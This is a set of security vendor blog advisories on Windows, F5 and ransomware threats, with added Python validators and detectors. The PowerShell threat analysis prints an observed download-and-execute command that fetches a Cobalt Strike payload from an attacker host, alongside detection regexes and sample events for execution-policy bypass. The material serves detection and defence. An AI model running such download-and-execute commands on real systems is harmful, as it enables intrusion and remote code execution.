    The vulnerability lies in the way ICMPv6 packets are handled by the TCP/IP stack when the IPv6 Recursive DNS Server (RDNSS) option is used. As the team at Sophos states:

    There is a logic flaw in tcpip.sys that can be exploited by crafting a router advertisement packet containing more data than expected, which results in the driver putting more bytes of data on its memory stack than provided for in the driver’s code, resulting in a buffer overflow. In theory, this could be used for both denial of service and remote code execution attacks. But in practice, achieving remote code execution would be extremely difficult.

    At this point in time, there have been no known exploitations of this vulnerability, only proof of concept testing.
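    To make the “more data than expected” description concrete from the receiving side, here is an added example (not Microsoft’s, Sophos’s or Blumira’s code) in Python: a small validator that walks the option TLVs of an ICMPv6 Router Advertisement and checks any RDNSS option against RFC 8106, whose length field must be odd and at least 3 because the option is an 8-byte header followed by whole 16-byte addresses. The checks are the kind a network monitor or a fuzzing harness for a host stack would apply. The builder functions exist only so the validator can run offline on a constructed, well-formed advertisement; the checksum is left zero and 2001:db8::53 is from the documentation prefix.

```python
import ipaddress
import struct

ICMPV6_ROUTER_ADVERT = 134
OPT_RDNSS = 25        # RFC 8106 Recursive DNS Server option
RA_HEADER_LEN = 16    # type, code, checksum, hop limit, flags, lifetime, reachable, retrans


def parse_ra_options(icmp):
    """Walk the TLV options that follow the RA header (RFC 4861). Returns
    (options, issues); each option is (type, length in 8-octet units, body
    bytes after the 2-byte option header)."""
    issues = []
    if len(icmp) < RA_HEADER_LEN or icmp[0] != ICMPV6_ROUTER_ADVERT:
        return [], ["not an ICMPv6 Router Advertisement"]
    options, off = [], RA_HEADER_LEN
    while off < len(icmp):
        if len(icmp) - off < 2:
            issues.append(f"truncated option header at offset {off}")
            break
        otype, olen = icmp[off], icmp[off + 1]
        if olen == 0:                      # RFC 4861 forbids a zero length
            issues.append(f"option {otype}: zero length")
            break
        end = off + olen * 8
        if end > len(icmp):                # declared length exceeds the packet
            issues.append(f"option {otype}: length {olen} runs past end of packet")
            break
        options.append((otype, olen, icmp[off + 2:end]))
        off = end
    return options, issues


def check_rdnss(olen, body):
    """RDNSS layout: reserved(2) lifetime(4) then whole 16-byte addresses, so
    the length field must be odd and at least 3. An even length means the
    option carries bytes that are not a whole address."""
    problems = []
    if olen < 3:
        problems.append("RDNSS: length below minimum of 3")
    if olen % 2 == 0:
        problems.append("RDNSS: even length, trailing bytes are not a whole address")
    addr_bytes = body[6:]
    addrs = [str(ipaddress.IPv6Address(addr_bytes[i:i + 16]))
             for i in range(0, len(addr_bytes) - len(addr_bytes) % 16, 16)]
    return addrs, problems


def audit_ra(icmp):
    """Return (DNS servers advertised, list of structural problems found)."""
    options, issues = parse_ra_options(icmp)
    servers = []
    for otype, olen, body in options:
        if otype == OPT_RDNSS:
            addrs, problems = check_rdnss(olen, body)
            servers.extend(addrs)
            issues.extend(problems)
    return servers, issues


def build_ra(options=b""):
    """Constructed RA header (checksum left zero) for offline testing."""
    return struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0) + options


def rdnss_option(addresses, lifetime=3600):
    """Well-formed RDNSS option: length = 1 header unit + 2 units per address."""
    packed = b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    length = 1 + 2 * len(addresses)
    return struct.pack("!BBHI", OPT_RDNSS, length, 0, lifetime) + packed


if __name__ == "__main__":
    print(audit_ra(build_ra(rdnss_option(["2001:db8::53"]))))
```

    Two of the validator's findings matter for this bug class: an option whose declared length runs past the packet, and an RDNSS option whose length is even. A stack that trusts the length field to derive the address count, instead of rejecting anything that is not 1 + 2n, has exactly the kind of arithmetic the Sophos description points at; rejecting the option before copying is the fix, and logging the sender is the detection.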

    Who’s Affected & Mitigation

    All Windows 10 versions, as well as Windows Server 2019 and above, are affected by this vulnerability.

    Mitigation for CVE-2020-16898/9

    The proper and recommended mitigation for these vulnerabilities is to apply the Microsoft security patches released yesterday, October 13, 2020, for affected devices.

    Workaround:
    You can prevent exploitation by disabling ICMPv6 RDNSS with the netsh command below, run from an elevated PowerShell or command prompt, replacing *INTERFACENUMBER* with the interface index (netsh int ipv6 show int lists them). This workaround is only available for Windows 1709 and above.

    netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

    Note: No reboot is needed after making the change.


    Medium
    August 4, 2020

    Protecting Against Ragnar Locker Ransomware

    A recent ransomware attack has hit a corporate travel agency that provides services to Fortune 500 and other companies, demanding $4 million in Bitcoin as ransom.

    Researcher @JAMESWT shared a malware sample used against CWT (formerly Carlson Wagonlit Travel), according to Threatpost. The ransomware was identified as Ragnar Locker, used previously to attack Energias de Portugal (EDP), demanding $11 million in Bitcoin as ransom.

    First spotted in December 2019, Ragnar Locker is known for targeting corporate entities, performing reconnaissance or discovery research on a network/target before executing the ransomware. It uses a variety of different techniques, including:

    • Attacking Windows Remote Desktop Protocol (RDP) connections to gain a foothold in networks
    • Exploiting managed service providers’ remote management software for network access, like ConnectWise and Kaseya
    • Gaining administrator-level access to domains
    • Using native Windows administrative tools like PowerShell and Windows Group Policy Objects (GPO) for lateral movement to Windows clients and servers

    (Source: Sophos)

    The method of using legitimate and already-existing tools within a target’s environment to execute attacks is known as Living-off-the-Land. The use of these tactics and tools results in clever evasion and bypassing of security software detection.

    Securing Against RDP Ransomware Risks

    RDP is one of the most common ways attackers install ransomware on systems, as can be seen in recent attacks on the major Japanese car manufacturer Honda and an Argentinian energy distributor – learn more in RDP Risk: Ransomware Targets Manufacturing and Energy Plants.

    At Blumira, we saw an 85% increase in RDP attacks against our honeypots between December 2019 and April 2020, as many organizations quickly shifted to remote-only work during the COVID-19 pandemic.

    As can be found in the above post, Blumira recommends that:

    Windows Security Log Resources to Protect Against Ransomware

    Because so many organizations of all sizes run Windows environments, they are natural targets for ransomware like Ragnar Locker, which leverages built-in Windows tools to move laterally and install malware on their networks.

    To help any organization easily increase their visibility into Windows security logs for better threat detection and response, Blumira is offering a free set of pre-configured Windows policy settings available on Github.

    Sr. Incident Response Engineer Amanda Berlin created Logmira to help organizations quickly import GPO settings into their environment. She has also provided many other Windows how-tos, tutorials and on-demand webinars to help security and IT teams:

    In one of the articles she’s written, she covers a real-life detection by Blumira’s platform within a customer’s environment, a PowerShell execution bypass attempt that is used by attackers to execute code on systems without administrative access. As mentioned earlier, threat actors behind the Ragnar Locker ransomware attacks leverage common Windows tools like PowerShell and GPO to move laterally to Windows clients and servers.

    In this case, the PowerShell execution policy bypass finding was linked to files from a popular hacking tool called Cobalt Strike, a type of software typically used by red team operations but sometimes also seen in use for malicious purposes. A particular part of the application was used – the part that can execute PowerShell scripts, download files and spawn other payloads, according to Berlin.

    In Blumira’s platform, we provide playbooks on next steps. In this case, we recommended that the organization remove the device from the network if possible and start internal incident response procedures. We also recommend auditing the device, paying closer attention to PowerShell commands executed by examining any logs around the time of the event. See more in Analysis of a Threat: PowerShell Malicious Activity.

    Blumira’s cloud SIEM platform provides both automated threat detection and actionable response for organizations of any size. We detect and provide playbooks for a number of findings related to the entire chain of ransomware infection – from indicators of attacker reconnaissance (like scanning) to lateral movement and unauthorized or anomalous access activity, as well as any malware, ransomware and data exfiltration that would indicate a breach in progress.

    Learn more about our product and schedule a demo today.

    Medium
    July 22, 2020

    Detect and Protect Against Emotet Malware

    One of the most active malware threats in the past few years, Emotet (also referred to as Heodo or Geodo), has been recently seen in new phishing spam campaigns, after a five-month pause in activity. When it was initially spotted in 2014, it acted as a botnet that stole banking credentials. Now used as a backdoor, Emotet loads third-party payloads and modules used for spam, stealing credentials, email harvesting and spreading across local networks, according to Proofpoint researchers.

    Researchers have observed Emotet installing a Trojan known as TrickBot, a type of advanced malware that infects Windows machines. TrickBot can download modules that attempt to spread laterally through your network, steal Active Directory databases, harvest login credentials from browsers, steal RDP (Remote Desktop Protocol) credentials and OpenSSH keys and more, according to BleepingComputer.

    It has also been known to allow attackers access to infected networks, enabling them to install certain types of ransomware by opening up a reverse shell. Emotet has been noted as an initial entry point linked to the eventual infection of the Ryuk ransomware, often a few weeks later in the infection chain. This indicates different attackers may be collaborating on techniques to move throughout victims’ environments. Ryuk is a type of crypto-ransomware first discovered in August 2018, targeting enterprises while asking for large Bitcoin ransom payments, according to Malwarebytes.

    Prevent and detect security threats before they result in ransomware infection with Blumira’s automated threat detection & response.

    Learn more about Ransomware Prevention & Detection >

    How Does Emotet Spread?

    Like many other types of ransomware and malware, Emotet typically begins with a phishing email sent to a user, with the most common subjects referring to transactions, payments or invoices. The email body content similarly refers to missed or upcoming payments and financial statements, conveying a sense of urgency and importance as all good phishing emails do. Finally, Microsoft Word document attachments with macros and malicious URLs contain downloaders that attempt to download the Emotet payload.

    According to SiliconAngle, campaigns also involve a malicious Microsoft Office document that presents an Office 365 error to the user. After the user approves running the macros, the code launches PowerShell to retrieve Emotet from a compromised site.

    The use of legitimate, existing tools in a Windows environment like PowerShell is known as a Living-off-the-Land technique that attackers employ to evade common detection tools and hide their activity. According to a Symantec analysis, PowerShell accounted for 22% of all dual-use tools used as malware downloaders, and PowerShell, Windows Management Instrumentation (WMI) and the command-line tool were the three tools most often used by attackers for malicious purposes.

    Back in April, Blumira’s security team detected a PowerShell execution policy bypass attempt, which we detailed in Analysis of a Threat: PowerShell Malicious Activity. Our on-demand webinar, Windows Logging Tips for Better Threat Detection also gives you some free guidance on getting visibility into your Windows environment.

    How To Detect Emotet

    To detect and protect against malware like Emotet, organizations can use email security technology like Proofpoint Advanced Threat Protection to help detect known threats, malicious attachments and unsafe URLs (specifically, with Proofpoint Targeted Attack Protection). Or, use a sandbox security platform like Palo Alto Networks Wildfire that integrates with your next-generation firewall to detect and analyze known or unknown attacks, including malware.

    Other security tools you could use for an additional layer of defense, according to Blumira’s Director of Security Mike Behrmann, include cloud-based, next-generation antivirus (NGAV) that can help you identify threats faster based on behavioral detection.

    Integrated Security for Advanced Threat Detection & Response

    Blumira easily integrates with both Proofpoint and PAN. That means when you connect these tools with Blumira’s cloud SIEM platform, you can start sending logs and events to us for parsing and analysis.

    Our pre-built detection rules identify any attacker techniques or malware that matches either Emotet’s profile or that of the malware and ransomware that can follow as a result (including lateral movement or any indicators of stolen credentials and unauthorized access attempts). Then we alert your team and provide a playbook on how to respond, block the threat, or next steps for remediation.

    To keep our platform up to date on the latest threats, Blumira ingests many different types of data feeds. One of the many threat intelligence feeds we use is Abuse.ch’s Feodo Tracker, which includes blocklists of malicious botnet servers associated with Dridex and Emotet/Heodo.

    To protect against attacks like Emotet, your security team needs to automate their threat detection, investigation, analysis and response. Blumira helps surface the most important findings with contextual evidence to save your team the time to go into every security tool and pull information, then decide what to do next. We automate the incident response process to provide both visibility and speed for security operations so you can better protect your organization against malware attacks.

    Threat Detection & Response Assessment

    Protecting against cyberthreats in this era of remote work is more challenging than ever. Do you know if your organization has all of the capabilities to detect and respond to modern threats?

    To help you do a gap analysis, Blumira has created a checklist of the different areas of threat detection and response – from logging to alerting to audits and compliance – so you can measure your current security maturity and identify any missing capabilities.

    Download the Guide

    Critical
    July 14, 2020

    What You Need to Know About SigRed: Windows DNS Vulnerability (CVE-2020-1350)

    Two researchers at Check Point Research recently discovered a critical vulnerability in the Windows DNS server (CVE-2020-1350)

    Microsoft Security
    CVE

    Two researchers at Check Point Research recently discovered a critical vulnerability in the Windows DNS server (CVE-2020-1350), also known as ‘SigRed.’ Microsoft has acknowledged this vulnerability and defined it as a wormable critical vulnerability (CVSS score 10.0). If exploited successfully, an attacker would be granted Domain Administrator rights.

    Microsoft said it found no evidence to show that the bug has been actively exploited by attackers, and advised users to install patches immediately.

    “Windows DNS Server is a core networking component. While this vulnerability is not currently known to be used in active attacks, it is essential that customers apply Windows updates to address this vulnerability as soon as possible,” Microsoft said.

    How It Works

    SigRed takes advantage of how the Windows DNS server parses incoming DNS queries and handles forwarded queries. An attacker sets up a malicious nameserver to which queries for their domains and subdomains are forwarded. That nameserver returns a response larger than 64KB, which triggers an integer overflow in the server's parsing code. To push the response size far enough, the attacker also abuses DNS name compression in combination with the buffer overflow.

    More information will be provided in the coming days by the Check Point Research team on the specifics of the vulnerability.

    Who’s Affected & Mitigation

    Microsoft Windows Server versions 2003 and above are affected by this vulnerability.

    Even if a DNS Server isn’t directly connected to the internet, the researchers state that it can be successfully compromised, even through browsers.

    SigRed can be triggered remotely via a browser in limited scenarios (e.g., Internet Explorer and non-Chromium based Microsoft Edge browsers), allowing an attacker to abuse Windows DNS servers’ support for connection reuse and query pipelining features to “smuggle” a DNS query inside an HTTP request payload to a target DNS server upon visiting a website under their control (TheHackerNews).

    A patch will shortly be released by Microsoft, but in the meantime a workaround is provided that reduces the maximum allowed size of a DNS packet received over TCP.

    Workaround:

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v "TcpReceivePacketSize" /t REG_DWORD /d 0xFF00 /f
    net stop DNS && net start DNS

    More Resources



    Critical
    July 6, 2020

    What You Need to Know About the Severe F5 BIG-IP Vulnerability

    A private security researcher named Mikhail Klyuchnikov disclosed a substantial vulnerability relating to F5 Networks’ product BIG-IP over the weekend. F5 BIG-IP LTM uses specialized hardware to offload SSL encryption from data center servers. F5 BIG-IP LTM works to improve application performance.

    Known as CVE-2020-5902, this vulnerability was given a 10 out of 10 severity, which is a rare occurrence among the CVEs we see today. The score reflects the impact: the flaw can be exploited remotely without authentication, potentially resulting in complete system compromise, and the attack is simple to carry out.

    How It Works

    This vulnerability affects the Traffic Management User Interface (TMUI), also referred to as the Configuration utility. It can allow for remote code execution, and doesn’t require any authentication.

    Exploitation is simple. When attackers find an F5 BIG-IP on the internet, they simply have to run a login string command in the address bar to gain access to a victim’s system. These strings can be found here on GitHub.

    Researcher Mikhail Klyuchnikov said:

    By exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE). The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.

    RCE, in this case, results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.

    Who’s Affected & Mitigation

    As stated above, only companies that enable public internet access to their F5 BIG-IP web interface are affected.

    Affected companies are advised to update. Vulnerable versions of BIG-IP (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be replaced by the corresponding updated versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4).

    Users of public cloud marketplaces such as AWS, Azure, GCP, and Alibaba should switch to BIG-IP Virtual Edition (VE) versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.0.1.4, or 15.1.0.4, if available.

    F5 has released a fix in their latest patch release, found in Solution K52145254.



    Medium
    June 23, 2020

    RDP Risk: Ransomware Targets Manufacturing and Energy Plants

    A few weeks ago, a ransomware attack hit major Japanese car manufacturer Honda. A similar attack struck the systems of Edesur, a distributor of electricity in Argentina owned by Enel Argentina, a green energy supplier.



    Manufacturing
    Ransomware

    The attack affected Honda’s ability to access its computer servers, email and internal systems, as well as impacting its production systems located outside of Japan, according to the BBC. This resulted in the suspension of production in North America, Turkey, Italy, Japan and the U.K. The company also temporarily shut down its customer and financial services operations. Honda stated that one of its internal servers was attacked externally, and that the virus had spread throughout its network.

    In a comparison of malware samples targeting Honda and Enel posted online, Malwarebytes Labs found that the incidents may be tied to the EKANS/SNAKE ransomware family. EKANS includes not only traditional file encryption and ransomware note features, but also additional functionality that forcibly stops ICS-related (industrial control system) operational processes, according to a Dragos analysis. That could explain why this particular type of ransomware targeted both manufacturing and energy plants (Honda and Edesur).

    How was the ransomware delivered? While many organizations are typically infected with ransomware via phishing emails, Malwarebytes Labs found that both companies had some machines with RDP (Remote Desktop Protocol) access exposed publicly to the internet.

    While they can’t validate that it was the actual threat vector in this particular scenario, RDP is one of the most targeted methods to gain entry and infect systems with ransomware, as I wrote about previously in Top Security Threats: Detecting Ransomware Tactics.

    A Coveware report from 2019 found that RDP was one of the most common attack vectors for ransomware, accounting for 57% of all infections, followed by phishing at 26%.

    Source: Coveware

    While RDP should never be internet-facing, as it’s not a secure method of remote management, there are occasionally misconfigurations that may leave it open. In Verizon’s 2020 Data Breach Investigations Report (DBIR), they noted that errors (or misconfigurations) are now equally as common as social breaches, and more common than malware, spanning every industry. They attribute the increase since 2017 largely to internet-exposed storage discovered by security researchers and third parties.

    Detecting RDP Misconfigurations and Connections

    To help your team quickly respond to any risky connections that could result in potential ransomware infection, Blumira can detect and alert on any unauthorized access attempts. Our platform prioritizes the threats and notifies your responders of any public IPs attempting to connect via RDP to your network.

    For automated threat response, you can follow our step-by-step workflows to take immediate action. With Blumira’s Dynamic Block List, you can block the public source IPs from connecting to your network via RDP and reduce your overall attack surface.

    By integrating automated threat detection, correlation, analysis, hunting, response and remediation all in one platform, you can ease the burden on your limited IT or security staff, while detecting any indications of ransomware early enough to contain its impact on your company.

    Related Content

    Video: Replace Your SIEM With Automated Detection & Response – SIEMs provide a lot of complexity with little security value. See how Blumira’s modern security platform provides threat detection and response, with security orchestration and automation built into one simple platform.

    Webinar: How to Automate Threat Detection & Response – Join Blumira’s VP of Ops Patrick Garrity for an overview of how to automate your threat detection & response with Blumira’s modern security platform.

    Detecting RDP Attacks With Honeypots – See our honeypot data on remote access attack trends against RDP since the start of the pandemic and rise in remote work, and join our webinar to learn more.



    Medium
    April 21, 2020

    Threat Analysis: PowerShell Malicious Activity

    Microsoft Security

    The other day here at Blumira we had a customer detection trigger that caught our attention. This was a detection I created a while back with zero false positives so far for a PowerShell execution policy bypass attempt. Attackers and malicious software can leverage the PowerShell execution policy setting to execute code on systems without administrative access.

    Digging deeper into the attack, we can see some interesting files from a popular hacking tool called Cobalt Strike. In this article, we’ll cover how we were able to detect the attack, details about other information we were able to obtain on the compromised host, and what Cobalt Strike is.

    Threat Detection

    One of the main sources of rule and alert creation we use is the research that the offensive security community provides. Along with the everyday findings and creations of TTPs (Tactics, Techniques, & Procedures) from potential attackers, there are also a large set of alerts that have been used to detect malicious activity for years. In the blog post “15 Ways to Bypass the PowerShell Execution Policy,” Scott outlines the different ways an attacker or malicious software can bypass this feature.

    The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the systems. By default, it is set to “Restricted.” While this setting is not meant to be a security control, it is used often by attackers and malicious software to execute code on a system without having administrative-level access.

    Other information regarding PowerShell TTPs can be found in the MITRE ATT&CK Framework:

    There are several different ways to alert on PowerShell commands and scripts, including third-party software. It is also fairly straightforward to enable PowerShell logging through Microsoft Group Policy. To enable it in a Group Policy Object (GPO), configure the following settings:

    1. Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Configuration > Detailed Tracking > Audit Process Creation > Enable
    2. Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation > Include command line in process creation events > Enable
    3. User Configuration > Policies > Administrative Templates > Windows Components > Windows PowerShell > Enable and set module names to *

    After the advanced audit settings are configured, an attempt at bypassing the execution policy would end up showing up in the Event Viewer under Applications & Service logs > Microsoft > Windows > PowerShell > Operational as EventID 4103 shown below:

    Below is attempt #4 from the NetSPI blog mentioned above:

    “Download Script from URL and Execute with Invoke Expression

    This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.”

    When looking at the different ways that the execution policy can be bypassed, we were able to pull out all of the XML as well as the parsed logs through Blumira to create a couple of regexes that would cover the majority of the attacks. Now don’t be too critical of this next part. I’m no regex master, but hey – it worked. Here’s a portion of the regex:

    Host Application = .*((-(Enc|command Write-Host|nop |noprofile))|ExecutionPolicy (UnRestricted|Bypass|Remote-signed)|DownloadString

    OR

    ParameterBinding\\(Set-ExecutionPolicy\\): name=.ExecutionPolicy.; value=.(UnRestricted|Bypass|Remote-signed)

    Threat Deep Dive

    One of the major features we’ve built into Blumira’s platform are customized playbooks attached to each security finding of malicious or anomalous activity. They enable the customer to track if an administrative event or some other purposeful action has triggered a finding. In this case, our customer indicated that this was *not* an administrative action, and were directed on next steps to take.

    Blumira Customer Alert

    The Blumira finding is listed below. In this alert, you can see the commands run at the bottom of the screenshot under “Matched Evidence.”


    We see the command:

    powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('https://js.choosebudget.com:443/sc\u0441'))\

    This is the same command we tested above after enabling advanced auditing; just with a malicious file as the URL instead.

    If we break down the PowerShell command itself, it looks like this:

    • Powershell.exe – specifies it will be a standard PS command
    • -nop – This is a shortened version of -noprofile. A PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to customize the environment. You can add commands, aliases, functions, variables, snap-ins, modules and PowerShell drives. The -nop option starts PS without loading any profiles.
    • -w hidden – This is a shortened version of -WindowStyle, which sets the window style for the session. Valid values are Normal, Minimized, Maximized and Hidden.
    • -c – This is the shortened version of -Command, which is followed by the command to run
    • IEX – The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.
    • New-Object – The New-Object cmdlet creates an instance of a .NET Framework or COM object.
    • Net.webclient – Provides common methods for sending data to and receiving data from a resource identified by a URI.

    The rest is the listed download string for the webclient to pull files down locally.
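    As an added example (not Blumira's detection code), the following Python applies versions of the two regexes quoted above, balanced and made case-insensitive (with the RemoteSigned policy spelled as PowerShell does), to constructed Event ID 4103-style messages, and breaks a matching command line down the way the bullet list does. The URL and file paths in the samples are placeholders, not the indicators from the finding.

```python
import re

# Detection patterns adapted from the two regex fragments quoted in the post,
# with balanced groups and case-insensitive matching (powershell.exe switches
# are case-insensitive; "RemoteSigned" is the real policy name).
HOST_APP_PATTERN = re.compile(
    r"Host Application = .*("
    r"-(Enc|command Write-Host|nop |noprofile)"
    r"|ExecutionPolicy (Unrestricted|Bypass|RemoteSigned)"
    r"|DownloadString"
    r")",
    re.IGNORECASE,
)
SET_POLICY_PATTERN = re.compile(
    r"ParameterBinding\(Set-ExecutionPolicy\): name=.ExecutionPolicy.; "
    r"value=.(Unrestricted|Bypass|RemoteSigned)",
    re.IGNORECASE,
)

# Constructed sample messages shaped like the 4103 "Host Application" field
# and a Set-ExecutionPolicy ParameterBinding line (placeholder paths and URL).
SAMPLE_EVENTS = [
    "Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " -File C:\\scripts\\backup.ps1",
    "Host Application = powershell.exe -nop -w hidden -c \"IEX ((new-object "
    "net.webclient).downloadstring('https://example.invalid/payload'))\"",
    "ParameterBinding(Set-ExecutionPolicy): name=\"ExecutionPolicy\"; value=\"Bypass\"",
]

# Real powershell.exe switches: flags, switches taking one value, and
# switches that consume the rest of the line.
FLAG_SWITCHES = {"-nop": "NoProfile", "-noprofile": "NoProfile",
                 "-noni": "NonInteractive", "-nologo": "NoLogo"}
VALUE_SWITCHES = {"-w": "WindowStyle", "-windowstyle": "WindowStyle",
                  "-ep": "ExecutionPolicy", "-executionpolicy": "ExecutionPolicy"}
REST_SWITCHES = {"-c": "Command", "-command": "Command",
                 "-enc": "EncodedCommand", "-encodedcommand": "EncodedCommand"}


def match_event(message):
    """Return the name of the rule a log message trips, or None."""
    if HOST_APP_PATTERN.search(message):
        return "powershell_bypass_host_application"
    if SET_POLICY_PATTERN.search(message):
        return "powershell_set_executionpolicy"
    return None


def extract_command_line(message):
    """Pull the powershell.exe command line out of a 4103-style message."""
    m = re.search(r"Host Application = (.*)$", message)
    return m.group(1) if m else None


def parse_powershell_invocation(command_line):
    """Expand abbreviated switches (-nop, -w, -c, ...) into their full names."""
    tokens = command_line.split()
    parsed = {"executable": tokens[0] if tokens else ""}
    i = 1
    while i < len(tokens):
        key = tokens[i].lower()
        if key in FLAG_SWITCHES:
            parsed[FLAG_SWITCHES[key]] = True
            i += 1
        elif key in VALUE_SWITCHES and i + 1 < len(tokens):
            parsed[VALUE_SWITCHES[key]] = tokens[i + 1]
            i += 2
        elif key in REST_SWITCHES:
            # -Command / -EncodedCommand take everything that follows.
            parsed[REST_SWITCHES[key]] = " ".join(tokens[i + 1:]).strip('"')
            break
        else:
            parsed.setdefault("other", []).append(tokens[i])
            i += 1
    return parsed


def triage(message):
    """Apply the rules and, on a hit, list the indicators an analyst would note."""
    rule = match_event(message)
    result = {"rule": rule, "indicators": []}
    if rule is None:
        return result
    cmd = extract_command_line(message)
    if cmd:
        parsed = parse_powershell_invocation(cmd)
        result["parsed"] = parsed
        if parsed.get("NoProfile"):
            result["indicators"].append("profile skipped (-nop)")
        if str(parsed.get("WindowStyle", "")).lower() == "hidden":
            result["indicators"].append("hidden window")
        body = parsed.get("Command", "")
        if re.search(r"\bIEX\b|Invoke-Expression", body, re.IGNORECASE):
            result["indicators"].append("Invoke-Expression on a string")
        if re.search(r"DownloadString", body, re.IGNORECASE):
            result["indicators"].append("remote script fetched with DownloadString")
        if "EncodedCommand" in parsed:
            result["indicators"].append("encoded command")
    else:
        m = SET_POLICY_PATTERN.search(message)
        if m:
            result["indicators"].append("execution policy set to " + m.group(1))
    return result


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event))
```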

    The Attack

    At this point, we know that the client downloaded a file from a specific URL through PowerShell. What else can we find out about this file by looking at the server it came from?

    Nslookup js.choosebudget.com
    Non-authoritative answer:
    Name: js.choosebudget.com
    Address: 104.161.32.85

    According to Shodan, this host is located in Phoenix at a hosting provider; however, its hostname is dy.huanx9t.cn (.cn being the top-level domain for China), and it is listening on ports 22, 443, and 50050.


    The downloaded file ends up being a .tgz file (a gzip-compressed tar archive), and its hash identifies it as a Cobalt Strike file.

    Cobalt Strike is software that was created for Adversary simulations and red team operations. While it’s not commonly seen outside of red team or penetration test engagements, it’s also not unheard of for portions of this and other offensive team software to be used for malicious purposes. Specifically, the Beacon module of Cobalt Strike in this instance was used. It is the portion of the application that can execute PowerShell scripts, download files, and spawn other payloads.

    After some additional investigation, we can see additional files from the same host all with the same MD5 hash:

    ➜ md5sum jschoosebudget.tgz
    c59d2934eb5f452495a095e966958c05 jschoosebudget.tgz
    ➜ md5sum metadataupdate
    c59d2934eb5f452495a095e966958c05 metadataupdate
    ➜ md5sum SchedulerTransfer
    c59d2934eb5f452495a095e966958c05 SchedulerTransfer
    ➜ md5sum shopping300.mdb
    c59d2934eb5f452495a095e966958c05 shopping300.mdb
    ➜ md5sum z__82D6h
    c59d2934eb5f452495a095e966958c05 z__82D6h

    Blumira’s Recommendations for Mitigation

    In Blumira’s playbook for this threat detection (also known as the workflow), we provide two options for the customer to complete – since it was marked as “not an administrative action,” we offer a recommended threat mitigation, seen below:


    That mitigation is:

    “Perform an audit of the device and pay close attention to any PowerShell commands that have been executed by examining logs around this time of the event. Remove the device from the network if possible, and perform any internal incident response procedures.”

    This recommended mitigation comes from Blumira’s own internal security team to help customers quickly respond to detected threats – regardless if they have robust security teams of their own on staff. This is just one example of the many types of threats we detect in near real-time.

    Medium
    March 5, 2020

    Internet Explorer Groundhog Day Critical Vulnerabilities

    Microsoft Security

    This past Friday night (2020-01-17), Microsoft quietly disclosed a new critical Internet Explorer (IE) vulnerability that had been found being exploited in limited cases in the wild; however, no public exploit exists for the vulnerability – https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001. This issue impacts all versions of IE10 and 11 across all versions of Windows, from 7/2008 up to 10/2019. There is currently no patch for this threat to your IE environment, but there is a mitigation, which may or may not be feasible for your organization, depending on why IE is still used.

    The vulnerability is similar to many previous IE issues: a bug in jscript.dll, the component that allows ActiveX and other Windows COM objects to integrate into IE. If a browser without the mitigation in place visits a site hosting an exploit for this vulnerability, the attacker could run remote commands and potentially gain access in whatever context the browser is running, e.g., as the user or as an administrator on the machine.

    What should I do & how do I fix it?

    First, determine your internal use of IE and whether there’s any reason for it to be used at all. This workaround is the same as previous workarounds from Microsoft for IE-related vulnerabilities, and Blumira expects to see it presented again by Microsoft in the future. If you do not have a legacy use case for Internet Explorer, you should remove the browser from all Windows machines in your environment – see the Removing IE section below. This action alone will significantly improve your security posture across endpoints and servers.

    Blumira does recommend applying the mitigation found within the above Security Guidance; however, if you have a legacy need for IE, it’s likely this mitigation will break needed functionality. If you do have a legacy need for IE, Blumira recommends restricting the sites that IE can reach through allowlisting, to ensure that IE is only used within a limited scope – see the Mitigating IE section below. IE should never be used as a main browser; it is not secure, and where legacy needs exist they should be limited when and where possible.

    As active campaigns using this threat are identified and IPS vendors add signatures associated with this CVE, Blumira will update blocklists and conditions to ensure appropriate coverage for its customers.

    Removing Internet Explorer

    When and where possible, IE should be removed from hosts, servers and endpoints. If there is no legacy need for IE and another browser can be used, then IE should not be available for use. Removing IE is a simple PowerShell command that can be deployed out to your environment. As always, Blumira recommends testing this in a limited test group to ensure efficacy and reduce issues as the deployment moves forward.

    If on Windows x64 architecture:

    Disable-WindowsOptionalFeature -FeatureName Internet-Explorer-Optional-amd64 -Online

    If on Windows x86 architecture:

    Disable-WindowsOptionalFeature -FeatureName Internet-Explorer-Optional-x86 -Online

    Mitigating Internet Explorer

    If you must use IE within your environment, it’s important to first test the jscript.dll workarounds found in the advisory – https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001#ID0EUGAC. These workarounds change the permission of the jscript.dll file in an effort to generally remove the ability of the file to be leveraged in a threatening manner. By default, IE 9-11 use jscript9.dll, which is not impacted by this vulnerability, but certain webpages will trigger jscript.dll as the needed scripting engine.

    If these workarounds do not break the legacy sites or needed functionality in IE, then you are safe to proceed using IE with jscript.dll being limited in its access. If they do break the sites being accessed by IE, then you should move into mitigating Internet Explorer risk by reducing the number of sites it can access to only your limited sites. Additionally, ensuring you have layers of security in place, by having a robust endpoint solution on these hosts, is essential.

    Limiting Internet Explorer Scope

